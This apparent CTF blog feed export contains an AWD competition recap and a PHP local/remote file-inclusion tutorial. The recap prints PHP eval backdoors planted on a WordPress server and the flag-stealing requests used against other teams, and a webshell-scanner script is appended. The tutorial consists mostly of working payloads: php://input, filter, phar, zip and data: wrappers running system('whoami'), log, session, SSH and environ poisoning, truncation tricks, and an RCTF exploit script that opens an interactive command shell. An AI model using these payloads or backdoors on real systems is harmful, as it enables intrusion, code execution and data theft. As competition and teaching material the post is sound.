<content type="html"><![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="Oh, this is an invalid password. Check and try again, please." data-whm="OOPS, these decrypted content may changed, but you can still have a look."> <script id="hbeData" type="hbeData" data-hmacdigest="abca0a1d38efbba20e84d44ec59760921699ace4dd52e3cb8ea36e54311c1a47">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</script> <div class="hbe hbe-content"> <div class="hbe hbe-input hbe-input-default"> <input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass"> <label class="hbe hbe-input-label hbe-input-label-default" for="hbePass"> <span class="hbe hbe-input-label-content hbe-input-label-content-default">QAQ what is the password?!</span> </label> </div> </div></div><script data-pjax src="/lib/hbe.js"></script><link href="/css/hbe.style.css" rel="stylesheet" type="text/css">]]></content>
<summary type="html">This post is encrypted; a password is required to read it.</summary>
<category term="CTF" scheme="https://cr4ckm3.top/tags/CTF/"/>
<category term="php" scheme="https://cr4ckm3.top/tags/php/"/>
</entry>
<entry>
<title>Red Hat Cup on-site (AWD) round: summary</title>
<link href="https://cr4ckm3.top/2018/05/28/redhat_awd/"/>
<id>https://cr4ckm3.top/2018/05/28/redhat_awd/</id>
<published>2018-05-27T16:00:00.000Z</published>
<updated>2019-08-30T10:00:41.103Z</updated>
<content type="html"><![CDATA[<h1 id="web1"><a href="#web1" class="headerlink" title="web1"></a>web1</h1><h2 id="正常思路:"><a href="#正常思路:" class="headerlink" title="正常思路:"></a>The normal approach:</h2><p>Connect over SSH –> pack up a backup of the site over SFTP –> find the vulnerabilities / built-in backdoors –> patch the holes, remove the backdoors, use the holes to harvest flags in bulk –> submit automatically in bulk</p><p>When I got the server I found it was WordPress, so I went looking for the config file, to add my generic protection and logging code.<br>The first file I opened was <code>/var/www/html/wp-config.php</code>,<br>and it showed:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// line 1:</span></span><br><span class="line"><span class="meta"><?php</span> <span class="keyword">if</span>(md5(<span class="variable">$_POST</span>[a])===<span class="string">'some 32-character MD5'</span>){show_source(<span class="string">'/flag'</span>);@<span class="keyword">eval</span>(<span class="variable">$_POST</span>[b]);} <span class="meta">?></span></span><br></pre></td></tr></table></figure><p>I first assumed it was a backdoor built in by the organizers, but brute-forcing a 32-character MD5 is hardly realistic... so later people said it was a backdoor another team had planted. That fast! Astonishing!</p><p>SFTP was not enabled and we had no permission to run tar to pack up files. scp over SSH still worked for copying files out.</p><p>Within a few minutes someone had first blood.</p><p>I tried reading the Apache log: <code>/var/log/apache2/access.log </code><br>and found a <code>python-requests</code> User-Agent, which was abnormal.<br>Request URI:<br><code>/wp-content/upgrade/.web01.php?guo=d1and3ngzh3</code> (the 点灯者 team's shell)</p><p>So in <code>/wp-content/upgrade/.web01.php </code><br>I found: <code><?php @eval($_POST['power']);?></code></p><p>Copying that answer was enough to get the flag. <code>So points were being scored from the very start.</code> I remember we were ranked about 20th while not scoring; by the time the script was written and I wanted to submit automatically we had dropped to 30-something, and over many rounds in between we submitted no flag at all and lost a lot of points. That was the one thing that should never have happened.<br>From the flags of 50-odd teams at the start, only 8 teams' flags were left at the end.</p><p>Later I found many more payloads:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">web 1 wordpress </span><br><span class="line">There is a shell under /wp-content/upgrade/.</span><br><span class="line">/wp-config.php contains someone else's shell.</span><br><span class="line">/wp-login.php has a debug mode that gives RCE</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/wp-login.php?redirect_to=http%3A%2F%2F172.16.5.69%2Fwp-admin%2Ftools.php&reauth=1 HTTP/1.0" 200 3147 "/home/babyblog/flag/flag" "python-requests/2.18.4"</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/wp-admin/tools.php</span><br><span class="line"></span><br><span class="line">/wp-admin/tools.php?cmd=system(%22cat%20flag%22);</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"> /</span><br><span class="line"></span><br><span class="line">post:</span><br><span class="line">admin=system("cat /flag");</span><br></pre></td></tr></table></figure><h2 id="文件修改:"><a href="#文件修改:" class="headerlink" title="文件修改:"></a>File modification:</h2><p><code>www-data</code> has more privileges than <code>ctfuser</code>, so the account we had over SSH could not modify files owned by www-data.</p><p>We had no permission to modify the shells that had been written in; they were all "undying shells plus memory shells", so without restarting Apache they could not be removed.<br> One trick: use their own shell to <code>write a file upload endpoint</code>, then upload a clean file with <code>the same file name</code> to replace the compromised one.</p><h2 id="失误点"><a href="#失误点" class="headerlink" title="失误点:"></a>Mistakes:</h2><p>While writing the automation script an SSL certificate problem cost a lot of time. Passing (verify=False) to skip certificate verification finally solved it.</p><p>The organizers also allowed only one submission every 3 s, another thing that tripped us up.</p><p>So in the end we submitted flags by hand every round... (had we known, we would have submitted by hand from the start)</p><h1 id="web2"><a href="#web2" class="headerlink" title="web2:"></a>web2:</h1><p>A teammate caught a FineCMS cookie deserialization payload in the log.</p><p>He handed me a cookie deserialization payload while I was busy on web1, concentrating on code, with the venue's sound system rather loud. I did not hear that it was the web2 payload, so I fired it at web1. = =. My fault.</p><p>We defended web2 quite well. It went down once mid-way for no clear reason; we asked for a server reset, patched the holes quickly, and lost no more points after that.</p>]]></content>
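A sweep for the kind of backdoors described above (the password-gated eval prepended to wp-config.php, the hidden .web01.php, the eval($_POST[...]) one-liners), as an added example; it is not the author's code or anything from the competition. The fixture files are constructed, the MD5 value in them is a placeholder, and the PHP open tag is written with the \x3c escape so the fixture strings contain no raw angle brackets. Every match is an indicator to review by hand, not proof of compromise.

```python
"""Sweep a web root for webshell indicators.  Added example for the AWD notes
above; not the author's code.  Fixtures are constructed; the MD5 is a
placeholder; the PHP open tag is spelled with the \\x3c escape."""
import os
import re
import tempfile
from pathlib import Path

# (name, pattern) pairs.  Each is an indicator to review by hand, not proof.
INDICATORS = [
    ("eval_request", re.compile(r"\beval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")),
    ("md5_gate", re.compile(r"\bmd5\s*\(\s*\$_(POST|GET|REQUEST)\b")),
    ("dynamic_call", re.compile(r"\$_(POST|GET|REQUEST)\s*\[[^\]]*\]\s*\(")),
    ("shell_exec", re.compile(r"\b(system|passthru|shell_exec|popen|proc_open)\s*\(\s*\$_")),
    ("assert_request", re.compile(r"\bassert\s*\(\s*\$_")),
]
PHP_EXT = (".php", ".phtml", ".php5", ".inc")

OPEN_TAG = "\x3c?php"  # \x3c is the less-than sign

# Constructed fixture tree: relative path -> file content.
SAMPLES = {
    "wp-config.php": (
        OPEN_TAG + " if(md5($_POST[a])==='00112233445566778899aabbccddeeff')"
        "{show_source('/flag');@eval($_POST[b]);} ?>\n"
        + OPEN_TAG + "\ndefine('DB_NAME', 'wordpress');\n"
    ),
    "wp-content/upgrade/.web01.php": OPEN_TAG + " @eval($_POST['power']);?>\n",
    "wp-content/plugins/hello.php": OPEN_TAG + "\n$f = $_REQUEST['f']($_REQUEST['a']);\n",
    "index.php": OPEN_TAG + "\necho 'hello';\n",
}


def scan_file(path: Path):
    """Return [(indicator, line_no, line)] for one file."""
    hits = []
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return hits
    for no, line in enumerate(text.splitlines(), 1):
        for name, rx in INDICATORS:
            if rx.search(line):
                hits.append((name, no, line.strip()))
    return hits


def scan_tree(root: Path):
    """Walk root and report every PHP file with a hit.  A hidden PHP file
    (dotfile) is reported on its own, since that is where the shell in the
    notes was dropped."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(PHP_EXT):
                continue
            p = Path(dirpath) / fn
            hits = scan_file(p)
            if fn.startswith("."):
                hits.append(("hidden_php", 0, ""))
            if hits:
                report[p.relative_to(root).as_posix()] = hits
    return report


def demo():
    """Materialize the fixtures in a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, content in SAMPLES.items():
            p = root / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(content)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, hits in sorted(demo().items()):
        for name, no, line in hits:
            print(f"{rel}:{no}: {name}: {line}")
```

In a live AWD round, run scan_tree over the site backup before patching and again after every round, and diff the reports: a file that gains a hit between rounds is a freshly planted shell even when its name looks legitimate.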
<summary type="html"><h1 id="web1"><a href="#web1" class="headerlink" title="web1"></a>web1</h1><h2 id="正常思路:"><a href="#正常思路:" class="headerlink" title="正常思路:"></summary>
<category term="CTF" scheme="https://cr4ckm3.top/tags/CTF/"/>
<category term="AWD" scheme="https://cr4ckm3.top/tags/AWD/"/>
</entry>
<entry>
<title>PHP file inclusion</title>
<link href="https://cr4ckm3.top/2018/05/24/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/"/>
<id>https://cr4ckm3.top/2018/05/24/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/</id>
<published>2018-05-24T03:00:00.000Z</published>
<updated>2019-08-30T10:00:42.323Z</updated>
<content type="html"><![CDATA[<center><h2> `"所谓博客,只不过是孤芳自赏罢了"`</h2></center><span id="more"></span><h1 id="相关函数"><a href="#相关函数" class="headerlink" title="相关函数"></a>相关函数</h1><p>php中引发文件包含漏洞的通常是以下四个函数:</p><ul><li>include()</li><li>include_once()</li><li>require()</li><li>require_once()</li></ul><p>reuqire() 如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句。<br><img src="/image/php_file_include/1.png" alt="require"></p><p>include() 如果出错的话,只会提出警告,会继续执行后续语句。</p><p><img src="/image/php_file_include/2.png" alt="include"></p><p>require_once() 和 include_once() 功能与require() 和 include() 类似。但如果一个文件已经被包含过了,则 require_once() 和 include_once() 则不会再包含它,以避免函数重定义或变量重赋值等问题。</p><p>当利用这四个函数来包含文件时,不管文件是什么类型(图片、txt等等),都会直接作为php文件进行解析。测试代码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">include</span> <span class="variable">$file</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>在同目录下有个phpinfo.txt,其内容为<code><? 
phpinfo(); ?></code>。则只需要访问:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=phpinfo.txt</span><br></pre></td></tr></table></figure><p>即可成功解析phpinfo。</p><p><img src="/image/php_file_include/3.png" alt="phpinfo"></p><h2 id="场景"><a href="#场景" class="headerlink" title="场景"></a>场景</h2><ul><li>具有相关的文件包含函数。</li><li>文件包含函数中存在动态变量,比如 <code>include $file;</code>。</li><li>攻击者能够控制该变量,比如<code>$file = $_GET['file'];</code>。</li></ul><h2 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h2><ul><li>LFI (Local File Inclusion)</li></ul><p>本地文件包含漏洞,顾名思义,指的是能打开并包含本地文件的漏洞。大部分情况下遇到的文件包含漏洞都是LFI。简单的测试用例如前所示。</p><ul><li>RFI (Remote File Inclusion)</li></ul><p>远程文件包含漏洞。是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的,因此漏洞一旦存在危害性会很大。<br>但RFI的利用条件较为苛刻,需要php.ini中进行配置</p><ol><li> <code>allow_url_fopen = On</code></li><li> <code>allow_url_include = On</code></li></ol><p>两个配置选项均需要为On,才能远程包含文件成功。</p><p><img src="/image/php_file_include/4.png" alt="RFI"></p><p>在php.ini中,allow_url_fopen默认一直是On,而allow_url_include从php5.2之后就默认为Off。</p><h1 id="包含姿势"><a href="#包含姿势" class="headerlink" title="包含姿势"></a>包含姿势</h1><p>下面例子中测试代码均为:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><ul><li>allow_url_fopen 默认为 On</li><li>allow_url_include 默认为 Off</li></ul><p>若有特殊要求,会在利用条件里指出。</p><h2 id="php伪协议"><a href="#php伪协议" class="headerlink" title="php伪协议"></a>php伪协议</h2><h3 id="php-input"><a href="#php-input" class="headerlink" 
title="php://input"></a>php://input</h3><p>利用条件:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">allow_url_fopen不做要求。</span><br><span class="line">allow_url_include = On</span><br></pre></td></tr></table></figure><p>姿势:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=php://input</span><br><span class="line"></span><br><span class="line">POST:</span><br><span class="line"><? phpinfo();?></span><br></pre></td></tr></table></figure><p><img src="/image/php_file_include/5.png" alt="php://"></p><h3 id="php-filter"><a href="#php-filter" class="headerlink" title="php://filter"></a>php://filter</h3><p>利用条件:默认均可</p><p>姿势:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=php://filter/read=convert.base64-encode/resource=index.php</span><br></pre></td></tr></table></figure><p>通过指定末尾的文件,可以读取经base64加密后的文件源码.</p><p>其他姿势:</p><p><code>index.php?file=php://filter/convert.base64-encode/resource=index.php</code></p><p>效果跟前面一样,少了read等关键字。在绕过一些waf时也许有用。</p><h3 id="phar"><a href="#phar" class="headerlink" title="phar://"></a>phar://</h3><p>利用条件:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php版本大于等于php5.3.0</span><br></pre></td></tr></table></figure><p>姿势:</p><p>假设有个文件<code>phpinfo.txt</code>,其内容为<code><?php phpinfo(); ?></code>,打包成zip压缩包,如下:</p><p><img src="/image/php_file_include/9.png" alt="phar://"></p><p>指定绝对路径</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=phar:///var/www/test.zip/phpinfo.txt</span><br></pre></td></tr></table></figure><p><img src="/image/php_file_include/7.png" alt="7.png"></p><p>Or by a relative path (here test.zip sits one directory up):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=phar://../test.zip/phpinfo.txt</span><br></pre></td></tr></table></figure><p><img src="/image/php_file_include/6.png" alt="6.png"></p><h1 id="RCTF-2018-Backdoor"><a href="#RCTF-2018-Backdoor" class="headerlink" title="RCTF 2018 Backdoor"></a>RCTF 2018 Backdoor</h1><ul><li><a href="https://xz.aliyun.com/t/2347">RCTF 2018 Writeup — De1ta</a></li></ul><p>One challenge that exercised both <code>php://filter</code> and <code>phar://</code>.</p><p><a href="http://backdoor.2018.teamrois.cn/">http://backdoor.2018.teamrois.cn/</a></p><p>First, read the source of post.php through the filter wrapper (the include appends <code>.php</code> itself, so the resource is named without the extension):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://backdoor.2018.teamrois.cn/post.php?action=php://filter/read=convert.base64-encode/resource=post</span><br></pre></td></tr></table></figure><h2 id="post-php"><a href="#post-php" class="headerlink" title="post.php"></a>post.php</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include</span> <span class="variable">$_GET</span>[<span class="string">'action'</span>] . <span class="string">'.php'</span>;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Read upload.php the same way:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://backdoor.2018.teamrois.cn/post.php?action=php://filter/read=convert.base64-encode/resource=upload</span><br></pre></td></tr></table></figure><h2 id="upload-php"><a href="#upload-php" class="headerlink" title="upload.php"></a>upload.php</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_FILES</span>[<span class="string">'file'</span>])) <span class="keyword">exit</span>;</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_FILES</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="variable">$zip</span> = <span class="keyword">new</span> ZipArchive();</span><br><span class="line"><span class="keyword">if</span> (<span class="literal">true</span> !== <span class="variable">$zip</span>->open(<span class="variable">$file</span>[<span class="string">'tmp_name'</span>])) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'No a valid zip'</span>;</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span> (<span class="literal">false</span> === <span class="variable">$zip</span>->getFromName(<span class="string">'tmp/random.txt'</span>)) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'No file'</span>;</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$dest</span> = <span class="string">'uploads/'</span> . md5(<span class="variable">$_SERVER</span>[<span class="string">'REMOTE_ADDR'</span>]) . hash(<span class="string">'sha256'</span>, file_get_contents(<span class="variable">$file</span>[<span class="string">'tmp_name'</span>])) . <span class="string">'.zip'</span>;</span><br><span class="line">move_uploaded_file(<span class="variable">$file</span>[<span class="string">'tmp_name'</span>], <span class="variable">$dest</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'Saved into '</span> . <span class="variable">$dest</span>;</span><br></pre></td></tr></table></figure><p>post.php has a file inclusion that forces a <code>.php</code> suffix. The phar:// or zip:// wrapper gets around that, because the suffix is then applied to a member name inside an archive we control, so a member holding our PHP code gets included and we get a shell. upload.php only accepts a valid zip that contains a <code>tmp/random.txt</code> entry, and it echoes the path the archive was saved under.</p><p>So we add an <code>evil.php</code> file to the archive. Requesting post.php with <code>action=phar://dest/evil</code> then includes <code>phar://dest/evil.php</code>, since post.php does <code>include $_GET['action'] . '.php'</code>.</p><h2 id="exp-py"><a href="#exp-py" class="headerlink" title="exp.py:"></a>exp.py:</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">s = <span class="string">"Saved into "</span></span><br><span class="line">post_url = <span class="string">"http://backdoor.2018.teamrois.cn/post.php?action=upload"</span></span><br><span class="line">zip_file = <span class="built_in">open</span>(<span class="string">"tmp.zip"</span>,<span class="string">"rb"</span>)</span><br><span class="line">upload_file = {<span class="string">'file'</span>:zip_file}</span><br><span class="line">r = requests.post(post_url,files=upload_file)</span><br><span class="line">dest = r.text[<span class="built_in">len</span>(s):]</span><br><span class="line">shell_url = <span class="string">"http://backdoor.2018.teamrois.cn/post.php?action=phar://"</span>+ dest + <span class="string">"/evil"</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">"[*] shell url: "</span> + shell_url)</span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"> command = <span class="built_in">input</span>(<span class="string">"command: "</span>)</span><br><span class="line"> payload = {<span class="string">'chybeta'</span>: <span class="string">'system("%s");'</span> % command}</span><br><span class="line"> r = requests.get(shell_url,params=payload)</span><br><span class="line"> <span class="built_in">print</span>(r.text)</span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="zip"><a href="#zip" class="headerlink" title="zip://"></a>zip://</h3><p>Exploitation requirements:</p><p>PHP version 5.3.0 or later<br>Technique:<br>Build the zip archive exactly as for phar.</p><p>With zip://, however, the archive is given by its full path and separated from the member name by <code>#</code>, which must be URL-encoded as <code>%23</code> (a literal <code>#</code> is a URL fragment and never reaches the server):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=zip://D:\phpStudy\WWW\fileinclude\test.zip%23phpinfo.txt</span><br></pre></td></tr></table></figure><h3 id="data-URI-schema"><a href="#data-URI-schema" class="headerlink" title="data: URI schema"></a>data: URI scheme</h3><p>Exploitation requirements:</p><p>PHP version 5.2 or later<br>allow_url_fopen = On<br>allow_url_include = On<br>Technique one:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=data:text/plain,<?php phpinfo();?></span><br></pre></td></tr></table></figure><p><img src="/image/php_file_include/8.png" alt="data:text/plain,<?php phpinfo();?>"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=data:text/plain,<?php system('whoami');?></span><br></pre></td></tr></table></figure><p><img src="/image/php_file_include/10.png" alt="system()"></p><p>Technique two:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b</span><br></pre></td></tr></table></figure><p>The plus sign is URL-encoded as <code>%2b</code>, since a raw <code>+</code> in a query string is decoded to a space and corrupts the base64; <code>PD9waHAgcGhwaW5mbygpOz8+</code> base64-decodes to <code><?php phpinfo();?></code>.</p><p>Executing a command:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=data:text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==</span><br></pre></td></tr></table></figure><p>where <code>PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==</code> base64-decodes to <code><?php system('whoami');?></code>.</p><h2 id="包含session"><a href="#包含session" class="headerlink" title="包含session"></a>Including session files</h2><p>Exploitation requirements: the session file path is known and part of its content is attacker-controlled.</p><p>Technique:</p><p>The directory PHP stores session files in is shown as session.save_path in phpinfo.</p><p>Common locations:</p><ul><li>/var/lib/php/sessions</li><li>/var/lib/php/sess_PHPSESSID</li><li>/tmp/sess_PHPSESSID</li><li>/tmp/sessions/sess_PHPSESSID</li></ul><p>The file is named sess_[phpsessid], and the PHPSESSID is visible in the Cookie header of your own requests.<br><img src="/image/php_file_include/16.png" alt="16.png"></p><p>To exploit it you must control part of the session file's content, and there is no universal way to do that. Often the approach is: include the session file first to see what it stores, find a field that reflects user input, write the payload into that field, then include the file again so that the PHP code runs.</p><p>For example, this article: <a href="http://kb.hitcon.org/post/165429468072/%E9%80%8F%E9%81%8E-lfi-%E5%BC%95%E5%85%A5-php-session-%E6%AA%94%E6%A1%88%E8%A7%B8%E7%99%BC-rce">Triggering RCE by including a PHP session file through LFI</a></p><p>Its closing summary:</p><p>When you run into an LFI, first check these candidate files:</p><ul><li>/etc/passwd</li><li>/proc/self/environ</li><li>All possible config files ( e.g. Apache /etc/httpd/conf/httpd.conf )</li><li>Web server access, error log ( e.g. /etc/httpd/logs/access_log )</li><li>Session files ( e.g. /tmp/sess_{SESSION_ID} )</li><li>In PHP, $_GET[1] and $_POST[1] avoid the quote-escaping problem (as mentioned earlier, it turned out afterwards that $_GET[b] also runs fine).</li></ul><h2 id="包含日志"><a href="#包含日志" class="headerlink" title="包含日志"></a>Including log files</h2><p>Access log</p><p>Common paths:</p><ul><li>/var/log/apache/access_log</li><li>/var/www/logs/access_log</li><li>/var/log/access_log</li></ul><p>To find the configured log location, read the virtual host configuration, e.g.</p><p><code>/etc/apache2/sites-enabled/000-default.conf</code></p><p><img src="/image/php_file_include/11.png" alt="000-default.conf"></p><p>Exploitation requirements: the log path on the server is known, and the log file is readable by the PHP process. That second condition is the usual blocker: on Debian-based systems Apache's logs are typically owned by root:adm with mode 640, so the web server user cannot read them unless permissions were loosened.</p><p>Technique:</p><p>Most web servers write each request to a log file. Apache records requests in <code>access.log</code> and errors in <code>error.log</code>, by default under <code>/var/log/apache2/</code>. What you send (the request path, the User-Agent header) is written into the log as-is, so a request carrying <code><?php ... ?></code> turns the log into a file that include() will execute.</p><p>Sending the payload straight from a browser does not work, because characters such as <code><</code>, <code>?</code> and spaces are URL-encoded and the logged line no longer parses as PHP. Intercept the request with Burp and edit the raw request instead.<br><img src="/image/php_file_include/12.png" alt="12.png"></p><p>In some setups the log location has been changed; read the relevant config file first, then include the log.</p><p>A CTF challenge built on log inclusion: <a href="https://chybeta.github.io/2017/08/06/SHACTF-2017-Web-writeup/#Methon-Two">SHACTF-2017- Bon Appétit (100)-writeup</a></p><p>and <a href="http://cr4ckm3.top/2018/05/01/2018%E7%BA%A2%E5%B8%BD%E6%9D%AF/">2018 Red Hat Cup (红帽杯)</a></p><h2 id="SSH-log"><a href="#SSH-log" class="headerlink" title="SSH log"></a>SSH log</h2><p>Exploitation requirements:</p><p>The location of the SSH authentication log is known and the file is readable.</p><p>By default it is <code>/var/log/auth.log</code></p><p>Technique:</p><p>Connect with ssh, using the payload as the user name:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">~$ ssh '<?php phpinfo(); ?>'@remotehost</span><br></pre></td></tr></table></figure><p>sshd then prompts for a password; type anything. The failed login is logged with the literal user name (for example as "Invalid user <?php phpinfo(); ?> from ..."), and including the log executes it.</p><p>Reference: <a href="http://www.hackingarticles.in/rce-with-lfi-and-ssh-log-poisoning/">RCE with LFI and SSH Log Poisoning</a></p><h2 id="包含environ-系统环境"><a href="#包含environ-系统环境" class="headerlink" title="包含environ 系统环境"></a>Including environ (the process environment)</h2><p>Exploitation requirements:</p><p>PHP runs as CGI, so that the environment of the PHP process carries the request headers, including the User-Agent.<br>The environ file's location (/proc/self/environ) is known and the file is readable.<br>Technique:</p><p>Under CGI the web server passes request headers to the PHP process as environment variables, so /proc/self/environ contains the User-Agent header (as HTTP_USER_AGENT). Put PHP code in the User-Agent header and it is written into environ; then include that file.</p><p>References:</p><p><a href="http://websecuritylog.blogspot.jp/2010/06/procselfenviron-injection.html">The proc/self/environ Injection</a></p><p><a href="https://www.exploit-db.com/papers/12886/">shell via LFI - proc/self/environ method</a></p><h1 id="本地包含小姿势"><a href="#本地包含小姿势" class="headerlink" title="本地包含小姿势"></a>Local inclusion tricks</h1><p>In code review you often meet template includes of this shape:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><?php include("inc/" . $_GET['file'] . ".htm"); ?> </span><br></pre></td></tr></table></figure><p>The fixed prefix and suffix can be cut off with the following tricks:</p><ul><li><p>Null-byte truncation:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/etc/passwd%00</span><br></pre></td></tr></table></figure><p>(requires magic_quotes_gpc=off; works in PHP versions before 5.3.4)</p></li><li><p>Null-byte truncation for directory listing:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/var/www/%00</span><br></pre></td></tr></table></figure><p>(requires magic_quotes_gpc=off and a Unix file system such as FreeBSD, OpenBSD, NetBSD or Solaris)</p></li><li><p>Path-length truncation:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/etc/passwd/././././././.[…]/./././././.</span><br></pre></td></tr></table></figure><p>(works in PHP versions below 5.2.8 (?); on Linux the path must be longer than 4096 bytes, on Windows longer than 256)</p></li><li><p>Dot truncation:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/boot.ini/………[…]…………</span><br></pre></td></tr></table></figure><p>(works in PHP versions below 5.2.8 (?), Windows only; more than 256 dots are needed)</p></li></ul><h1 id="参考:"><a href="#参考:" class="headerlink" title="参考:"></a>References:</h1><p><a href="https://dustri.org/b/from-lfi-to-rce-in-php.html">From LFI to RCE in php</a><br><a href="http://www.cnblogs.com/iamstudy/articles/include_file.html">l3m0n: File 